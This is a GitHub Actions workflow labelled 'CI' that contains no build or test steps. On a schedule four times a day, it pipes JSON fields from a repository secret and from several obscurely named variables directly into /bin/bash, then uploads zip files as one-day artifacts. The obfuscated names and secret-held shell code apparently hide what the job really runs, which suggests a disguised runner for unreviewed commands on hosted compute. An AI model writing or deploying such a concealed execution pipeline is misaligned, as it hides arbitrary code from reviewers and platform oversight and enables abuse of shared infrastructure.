name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '18 3,9,15,21 * * *'
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          z3275: ${{ secrets.z3275 }}
        run: |
          printf '%s' "$z3275" | jq -r .qn39 | /bin/bash
          echo $kwf04193 | jq -r .y5 | /bin/bash
          echo $n9311 | jq -r .yu8 | /bin/bash
          printf '%s' "$y195" | jq -r .v37 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: tpKa4rua
          path: "*.zip"
          retention-days: 1
